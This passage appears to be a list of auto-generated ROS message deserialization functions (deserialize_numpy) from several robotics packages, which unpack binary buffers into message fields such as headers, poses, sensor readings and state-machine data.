_x.paraset_byte21, _x.paraset_byte20, _x.paraset_byte19, _x.paraset_byte18, _x.paraset_byte17, _x.paraset_byte16, _x.paraset_byte15, _x.paraset_byte14, _x.paraset_byte13, _x.paraset_byte12, _x.paraset_byte11, _x.paraset_byte10, _x.paraset_byte9, _x.paraset_byte8, _x.paraset_byte7, _x.paraset_byte6, _x.paraset_byte5, _x.paraset_byte4, _x.paraset_byte3, _x.paraset_byte2, _x.paraset_byte1,) = _get_struct_56B().unpack(str[start:end])\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def deserialize_numpy(self, str, numpy):\n try:\n if self.header is None:\n self.header = std_msgs.msg.Header()\n if self.prefixes is None:\n self.prefixes = None\n if self.address is None:\n self.address = knowrob_semantic_map_msgs.msg.SemMapAddress()\n if self.objects is None:\n self.objects = None\n if self.actions is None:\n self.actions = None\n if self.object_properties is None:\n self.object_properties = None\n if self.data_properties is None:\n self.data_properties = None\n end = 0\n _x = self\n start = end\n end += 12\n (_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs,) = _struct_3I.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.header.frame_id = str[start:end].decode('utf-8')\n else:\n self.header.frame_id = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.namespace = str[start:end].decode('utf-8')\n else:\n self.namespace = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.id = str[start:end].decode('utf-8')\n else:\n self.id = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.prefixes = []\n for i in range(0, length):\n val1 = knowrob_semantic_map_msgs.msg.SemMapPrefix()\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1.name = str[start:end].decode('utf-8')\n else:\n val1.name = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1.prefix = str[start:end].decode('utf-8')\n else:\n val1.prefix = str[start:end]\n self.prefixes.append(val1)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.imports = []\n for i in range(0, length):\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1 = str[start:end].decode('utf-8')\n else:\n val1 = str[start:end]\n self.imports.append(val1)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.address.room_nr = str[start:end].decode('utf-8')\n else:\n self.address.room_nr = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.address.floor_nr = str[start:end].decode('utf-8')\n else:\n self.address.floor_nr = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.address.street_nr = str[start:end].decode('utf-8')\n else:\n self.address.street_nr = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.address.street_name = str[start:end].decode('utf-8')\n else:\n self.address.street_name = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.address.city_name = str[start:end].decode('utf-8')\n else:\n self.address.city_name = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.objects = []\n for i in range(0, length):\n val1 = knowrob_semantic_map_msgs.msg.SemMapObject()\n _v19 = val1.header\n start = end\n end += 4\n (_v19.seq,) = _struct_I.unpack(str[start:end])\n _v20 = _v19.stamp\n _x = _v20\n start = end\n end += 8\n (_x.secs, _x.nsecs,) = _struct_2I.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n _v19.frame_id = str[start:end].decode('utf-8')\n else:\n _v19.frame_id = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1.id = str[start:end].decode('utf-8')\n else:\n val1.id = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1.type = str[start:end].decode('utf-8')\n else:\n val1.type = str[start:end]\n _v21 = val1.size\n _x = _v21\n start = end\n end += 12\n (_x.x, _x.y, _x.z,) = _struct_3f.unpack(str[start:end])\n _v22 = val1.pose\n _v23 = _v22.position\n _x = _v23\n start = end\n end += 24\n (_x.x, _x.y, _x.z,) = _struct_3d.unpack(str[start:end])\n _v24 = _v22.orientation\n _x = _v24\n start = end\n end += 32\n (_x.x, _x.y, _x.z, _x.w,) = _struct_4d.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1.part_of = str[start:end].decode('utf-8')\n else:\n val1.part_of = str[start:end]\n self.objects.append(val1)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.actions = []\n for i in range(0, length):\n val1 = knowrob_semantic_map_msgs.msg.SemMapAction()\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1.id = str[start:end].decode('utf-8')\n else:\n val1.id = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1.type = str[start:end].decode('utf-8')\n else:\n val1.type = str[start:end]\n start = end\n end += 1\n (val1.asserted,) = _struct_B.unpack(str[start:end])\n val1.asserted = bool(val1.asserted)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1.object_acted_on = str[start:end].decode('utf-8')\n else:\n val1.object_acted_on = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n val1.subactions = []\n for i in range(0, length):\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val2 = str[start:end].decode('utf-8')\n else:\n val2 = str[start:end]\n val1.subactions.append(val2)\n _x = val1\n start = end\n end += 2\n (_x.quantification, _x.unordered,) = _struct_bB.unpack(str[start:end])\n val1.unordered = bool(val1.unordered)\n self.actions.append(val1)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.object_properties = []\n for i in range(0, length):\n val1 = knowrob_semantic_map_msgs.msg.SemMapObjectProperty()\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1.id = str[start:end].decode('utf-8')\n else:\n val1.id = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1.subject = str[start:end].decode('utf-8')\n else:\n val1.subject = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1.object = str[start:end].decode('utf-8')\n else:\n val1.object = str[start:end]\n self.object_properties.append(val1)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.data_properties = []\n for i in range(0, length):\n val1 = knowrob_semantic_map_msgs.msg.SemMapDataProperty()\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1.id = str[start:end].decode('utf-8')\n else:\n val1.id = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1.subject = str[start:end].decode('utf-8')\n else:\n val1.subject = str[start:end]\n start = end\n end += 1\n (val1.value_type,) = _struct_B.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1.value = str[start:end].decode('utf-8')\n else:\n val1.value = str[start:end]\n self.data_properties.append(val1)\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def deserialize_numpy(self, str, numpy):\n codecs.lookup_error(\"rosmsg\").msg_type = self._type\n try:\n if self.header is None:\n self.header = std_msgs.msg.Header()\n if self.type is None:\n self.type = std_msgs.msg.String()\n if self.parent_name is None:\n self.parent_name = std_msgs.msg.String()\n if self.name is None:\n self.name = std_msgs.msg.String()\n if self.pose is None:\n self.pose = geometry_msgs.msg.Pose()\n if self.sensed_objects is None:\n self.sensed_objects = None\n end = 0\n _x = self\n start = end\n end += 12\n (_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs,) = _get_struct_3I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.header.frame_id = str[start:end].decode('utf-8', 'rosmsg')\n else:\n self.header.frame_id = str[start:end]\n start = end\n end += 4\n (self.sim_step,) = _get_struct_I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.type.data = str[start:end].decode('utf-8', 'rosmsg')\n else:\n self.type.data = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.parent_name.data = str[start:end].decode('utf-8', 'rosmsg')\n else:\n self.parent_name.data = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.name.data = str[start:end].decode('utf-8', 'rosmsg')\n else:\n self.name.data = str[start:end]\n _x = self\n start = end\n end += 68\n (_x.wall_time, _x.sim_time, _x.pose.position.x, _x.pose.position.y, _x.pose.position.z, _x.pose.orientation.x, _x.pose.orientation.y, _x.pose.orientation.z, _x.pose.orientation.w, _x.count,) = _get_struct_2f7dI().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sB'%length\n start = end\n s = struct.Struct(pattern)\n end += s.size\n self.triggered = numpy.frombuffer(str[start:end], dtype=numpy.bool, count=length)\n self.triggered = list(map(bool, self.triggered))\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sf'%length\n start = end\n s = struct.Struct(pattern)\n end += s.size\n self.range = numpy.frombuffer(str[start:end], dtype=numpy.float32, count=length)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sf'%length\n start = end\n s = struct.Struct(pattern)\n end += s.size\n self.measurement = numpy.frombuffer(str[start:end], dtype=numpy.float32, count=length)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.sensed_objects = []\n for i in range(0, length):\n val1 = std_msgs.msg.String()\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1.data = str[start:end].decode('utf-8', 'rosmsg')\n else:\n val1.data = str[start:end]\n self.sensed_objects.append(val1)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n self.sensed_objects_map = str[start:end]\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) # most likely buffer underfill", "def deserialize_numpy(self, str, numpy):\n try:\n end = 0\n _x = self\n start = end\n end += 100\n (_x.id, _x.age, _x.velocidad_relativa_x, _x.velocidad_relativa_y, _x.velocidad_absoluta_x, _x.velocidad_absoluta_y, _x.velocidad_absoluta_sigma_x, _x.velocidad_absoluta_sigma_y, _x.bounding_box_centro_x, _x.bounding_box_centro_y, _x.bounding_box_largo, _x.bounding_box_ancho, _x.object_box_centro_x, _x.object_box_centro_y, _x.object_box_orientacion, _x.object_box_size_x, _x.object_box_size_y, _x.clasificacion, _x.clasificacion_age, _x.clasificacion_certeza, _x.punto_cercano_x, _x.punto_cercano_y, _x.punto_referencia_x, _x.punto_referencia_y, _x.punto_referencia_sigma_x, _x.punto_referencia_sigma_y,) = _get_struct_h16fh8f().unpack(str[start:end])\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def deserialize_numpy(self, str, numpy):\n try:\n if self.header is None:\n self.header = std_msgs.msg.Header()\n if self.RPY is None:\n self.RPY = geometry_msgs.msg.Vector3()\n if self.LLA is None:\n self.LLA = geometry_msgs.msg.Vector3()\n if self.NedVel is None:\n self.NedVel = geometry_msgs.msg.Vector3()\n end = 0\n _x = self\n start = end\n end += 12\n (_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs,) = _get_struct_3I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.header.frame_id = str[start:end].decode('utf-8')\n else:\n self.header.frame_id = str[start:end]\n _x = self\n start = end\n end += 116\n (_x.Time, _x.Week, _x.Status, _x.RPY.x, _x.RPY.y, _x.RPY.z, _x.LLA.x, _x.LLA.y, _x.LLA.z, _x.NedVel.x, _x.NedVel.y, _x.NedVel.z, _x.YawUncertainty, _x.PitchUncertainty, _x.RollUncertainty, _x.PosUncertainty, _x.VelUncertainty, _x.SyncInTime, _x.SyncInCount,) = _get_struct_d2H9d5fdI().unpack(str[start:end])\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def deserialize_numpy(self, str, numpy):\n try:\n end = 0\n _x = self\n start = end\n end += 112\n (_x.u0, _x.h0, _x.vl, _x.i0, _x.wv, _x.wh, _x.wi, _x.h_stop, _x.T_gap, _x.v_max, _x.v_min, _x.h_min, _x.i_max, _x.i_min,) = _struct_14d.unpack(str[start:end])\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def deserialize_numpy(self, str, numpy):\n try:\n if self.header is None:\n self.header = std_msgs.msg.Header()\n if self.pointA is None:\n self.pointA = nubot_common.msg.Point2d()\n if self.pointB is None:\n self.pointB = nubot_common.msg.Point2d()\n end = 0\n _x = self\n start = end\n end += 12\n (_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs,) = _get_struct_3I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.header.frame_id = str[start:end].decode('utf-8')\n else:\n self.header.frame_id = str[start:end]\n _x = self\n start = end\n end += 26\n (_x.MatchMode, _x.MatchType, _x.TestMode, _x.pointA.x, _x.pointA.y, _x.pointB.x, _x.pointB.y, _x.angleA, _x.angleB, _x.idA, _x.idB, _x.kickforce,) = _get_struct_3B4f2h3B().unpack(str[start:end])\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def deserialize_numpy(self, str, numpy):\n try:\n if self.pose is None:\n self.pose = geometry_msgs.msg.PoseWithCovariance()\n end = 0\n _x = self\n start = end\n end += 72\n (_x.detection_id, _x.confidence, _x.pose.pose.position.x, _x.pose.pose.position.y, _x.pose.pose.position.z, _x.pose.pose.orientation.x, _x.pose.pose.orientation.y, _x.pose.pose.orientation.z, _x.pose.pose.orientation.w,) = _get_struct_Q8d().unpack(str[start:end])\n start = end\n end += 288\n self.pose.covariance = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=36)\n _x = self\n start = end\n end += 40\n (_x.height, _x.bbox_x, _x.bbox_y, _x.bbox_w, _x.bbox_h,) = _get_struct_5d().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.modality = str[start:end].decode('utf-8')\n else:\n self.modality = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sf'%length\n start = end\n end += struct.calcsize(pattern)\n self.embed_vector = numpy.frombuffer(str[start:end], dtype=numpy.float32, count=length)\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def deserialize_numpy(self, str, numpy):\n try:\n if self.header is None:\n self.header = std_msgs.msg._Header.Header()\n end = 0\n _x = self\n start = end\n end += 12\n (_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs,) = _struct_3I.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n self.header.frame_id = str[start:end]\n _x = self\n start = end\n end += 9\n (_x.dvl_sts, _x.svs_sts, _x.fog_sts, _x.nav_sts, _x.bat_sts, _x.t_sts, _x.h_sts, _x.p_sts, _x.water_sts,) = _struct_9B.unpack(str[start:end])\n self.dvl_sts = bool(self.dvl_sts)\n self.svs_sts = bool(self.svs_sts)\n self.fog_sts = bool(self.fog_sts)\n self.nav_sts = bool(self.nav_sts)\n self.bat_sts = bool(self.bat_sts)\n self.t_sts = bool(self.t_sts)\n self.h_sts = bool(self.h_sts)\n self.p_sts = bool(self.p_sts)\n self.water_sts = bool(self.water_sts)\n return self\n except struct.error as e:\n raise roslib.message.DeserializationError(e) #most likely buffer underfill", "def deserialize_numpy(self, str, numpy):\n try:\n if self.header is None:\n self.header = std_msgs.msg.Header()\n if self.predict is None:\n self.predict = argus_msgs.msg.FilterPredictStep()\n if self.update is None:\n self.update = argus_msgs.msg.FilterUpdateStep()\n end = 0\n _x = self\n start = end\n end += 12\n (_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs,) = _get_struct_3I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.header.frame_id = str[start:end].decode('utf-8')\n else:\n self.header.frame_id = str[start:end]\n _x = self\n start = end\n end += 26\n (_x.step_num, _x.info_type, _x.predict.step_dt, _x.predict.trans_jacobian.column_major, _x.predict.trans_jacobian.rows, _x.predict.trans_jacobian.cols,) = _get_struct_QBdB2I().unpack(str[start:end])\n self.predict.trans_jacobian.column_major = bool(self.predict.trans_jacobian.column_major)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n end += struct.calcsize(pattern)\n self.predict.trans_jacobian.data = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length)\n _x = self\n start = end\n end += 9\n (_x.predict.trans_noise_cov.column_major, _x.predict.trans_noise_cov.rows, _x.predict.trans_noise_cov.cols,) = _get_struct_B2I().unpack(str[start:end])\n self.predict.trans_noise_cov.column_major = bool(self.predict.trans_noise_cov.column_major)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n end += struct.calcsize(pattern)\n self.predict.trans_noise_cov.data = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length)\n _x = self\n start = end\n end += 9\n (_x.predict.prior_state_cov.column_major, _x.predict.prior_state_cov.rows, _x.predict.prior_state_cov.cols,) = _get_struct_B2I().unpack(str[start:end])\n self.predict.prior_state_cov.column_major = bool(self.predict.prior_state_cov.column_major)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n end += struct.calcsize(pattern)\n self.predict.prior_state_cov.data = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length)\n _x = self\n start = end\n end += 9\n (_x.predict.post_state_cov.column_major, _x.predict.post_state_cov.rows, _x.predict.post_state_cov.cols,) = _get_struct_B2I().unpack(str[start:end])\n self.predict.post_state_cov.column_major = bool(self.predict.post_state_cov.column_major)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n end += struct.calcsize(pattern)\n self.predict.post_state_cov.data = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length)\n _x = self\n start = end\n end += 9\n (_x.update.prior_state_cov.column_major, _x.update.prior_state_cov.rows, _x.update.prior_state_cov.cols,) = _get_struct_B2I().unpack(str[start:end])\n self.update.prior_state_cov.column_major = bool(self.update.prior_state_cov.column_major)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n end += struct.calcsize(pattern)\n self.update.prior_state_cov.data = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n end += struct.calcsize(pattern)\n self.update.prior_obs_error = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length)\n _x = self\n start = end\n end += 9\n (_x.update.obs_error_cov.column_major, _x.update.obs_error_cov.rows, _x.update.obs_error_cov.cols,) = _get_struct_B2I().unpack(str[start:end])\n self.update.obs_error_cov.column_major = bool(self.update.obs_error_cov.column_major)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n end += struct.calcsize(pattern)\n self.update.obs_error_cov.data = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length)\n _x = self\n start = end\n end += 9\n (_x.update.post_state_cov.column_major, _x.update.post_state_cov.rows, _x.update.post_state_cov.cols,) = _get_struct_B2I().unpack(str[start:end])\n self.update.post_state_cov.column_major = bool(self.update.post_state_cov.column_major)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n end += struct.calcsize(pattern)\n self.update.post_state_cov.data = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n end += struct.calcsize(pattern)\n self.update.state_delta = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n end += struct.calcsize(pattern)\n self.update.post_obs_error = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length)\n _x = self\n start = end\n end += 9\n (_x.update.obs_jacobian.column_major, _x.update.obs_jacobian.rows, _x.update.obs_jacobian.cols,) = _get_struct_B2I().unpack(str[start:end])\n self.update.obs_jacobian.column_major = bool(self.update.obs_jacobian.column_major)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n end += struct.calcsize(pattern)\n self.update.obs_jacobian.data = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length)\n _x = self\n start = end\n end += 9\n (_x.update.obs_noise_cov.column_major, _x.update.obs_noise_cov.rows, _x.update.obs_noise_cov.cols,) = _get_struct_B2I().unpack(str[start:end])\n self.update.obs_noise_cov.column_major = bool(self.update.obs_noise_cov.column_major)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n end += struct.calcsize(pattern)\n self.update.obs_noise_cov.data = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length)\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def deserialize_numpy(self, str, numpy):\n try:\n end = 0\n start = end\n end += 1\n (self.type,) = _struct_B.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.model = str[start:end].decode('utf-8')\n else:\n self.model = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.head_version = str[start:end].decode('utf-8')\n else:\n self.head_version = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.body_version = str[start:end].decode('utf-8')\n else:\n self.body_version = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.arm_version = str[start:end].decode('utf-8')\n else:\n self.arm_version = str[start:end]\n _x = self\n start = end\n end += 14\n (_x.has_laser, _x.has_extended_arms, _x.number_of_legs, _x.number_of_arms, _x.number_of_hands,) = _struct_2B3i.unpack(str[start:end])\n self.has_laser = bool(self.has_laser)\n self.has_extended_arms = bool(self.has_extended_arms)\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def deserialize_numpy(self, str, numpy):\n try:\n if self.base is None:\n self.base = rwrc12_msgs.msg.CellBase()\n end = 0\n _x = self\n start = end\n end += 12\n (_x.base.header.seq, _x.base.header.stamp.secs, _x.base.header.stamp.nsecs,) = _struct_3I.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.base.header.frame_id = str[start:end].decode('utf-8')\n else:\n self.base.header.frame_id = str[start:end]\n _x = self\n start = end\n end += 20\n (_x.base.cell_width, _x.base.cell_height, _x.base.position.x, _x.base.position.y, _x.base.position.z,) = _struct_5f.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.base.points = []\n for i in range(0, length):\n val1 = geometry_msgs.msg.Point32()\n _x = val1\n start = end\n end += 12\n (_x.x, _x.y, _x.z,) = _struct_3f.unpack(str[start:end])\n self.base.points.append(val1)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sf'%length\n start = end\n end += struct.calcsize(pattern)\n self.base.intensity = numpy.frombuffer(str[start:end], dtype=numpy.float32, count=length)\n start = end\n end += 1\n (self.base.cost,) = _struct_b.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.base.label = str[start:end].decode('utf-8')\n else:\n self.base.label = str[start:end]\n _x = self\n start = end\n end += 8\n (_x.mean_height, _x.mean_intensity,) = _struct_2f.unpack(str[start:end])\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def deserialize_numpy(self, str, numpy):\n codecs.lookup_error(\"rosmsg\").msg_type = self._type\n try:\n if self.cond_transition is None:\n self.cond_transition = None\n end = 0\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.state_path = str[start:end].decode('utf-8', 'rosmsg')\n else:\n self.state_path = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.state_class = str[start:end].decode('utf-8', 'rosmsg')\n else:\n self.state_class = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.initial_state_name = str[start:end].decode('utf-8', 'rosmsg')\n else:\n self.initial_state_name = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.input_keys = []\n for i in range(0, length):\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1 = str[start:end].decode('utf-8', 'rosmsg')\n else:\n val1 = str[start:end]\n self.input_keys.append(val1)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.output_keys = []\n for i in range(0, length):\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1 = str[start:end].decode('utf-8', 'rosmsg')\n else:\n val1 = str[start:end]\n self.output_keys.append(val1)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.cond_outcome = []\n for i in range(0, length):\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1 = str[start:end].decode('utf-8', 'rosmsg')\n else:\n val1 = str[start:end]\n self.cond_outcome.append(val1)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.cond_transition = []\n for i in range(0, length):\n val1 = flexbe_msgs.msg.OutcomeCondition()\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n val1.state_name = []\n for i in range(0, length):\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val2 = str[start:end].decode('utf-8', 'rosmsg')\n else:\n val2 = str[start:end]\n val1.state_name.append(val2)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n val1.state_outcome = []\n for i in range(0, length):\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val2 = str[start:end].decode('utf-8', 'rosmsg')\n else:\n val2 = str[start:end]\n val1.state_outcome.append(val2)\n self.cond_transition.append(val1)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.behavior_class = str[start:end].decode('utf-8', 'rosmsg')\n else:\n self.behavior_class = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.parameter_names = []\n for i in range(0, length):\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1 = str[start:end].decode('utf-8', 'rosmsg')\n else:\n val1 = str[start:end]\n self.parameter_names.append(val1)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.parameter_values = []\n for i in range(0, length):\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1 = str[start:end].decode('utf-8', 'rosmsg')\n else:\n val1 = str[start:end]\n self.parameter_values.append(val1)\n start = end\n end += 8\n self.position = numpy.frombuffer(str[start:end], dtype=numpy.float32, count=2)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.outcomes = []\n for i in range(0, length):\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1 = str[start:end].decode('utf-8', 'rosmsg')\n else:\n val1 = str[start:end]\n self.outcomes.append(val1)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.transitions = []\n for i in range(0, length):\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1 = str[start:end].decode('utf-8', 'rosmsg')\n else:\n val1 = str[start:end]\n self.transitions.append(val1)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sb'%length\n start = end\n s = struct.Struct(pattern)\n end += s.size\n self.autonomy = numpy.frombuffer(str[start:end], dtype=numpy.int8, count=length)\n start = end\n end += 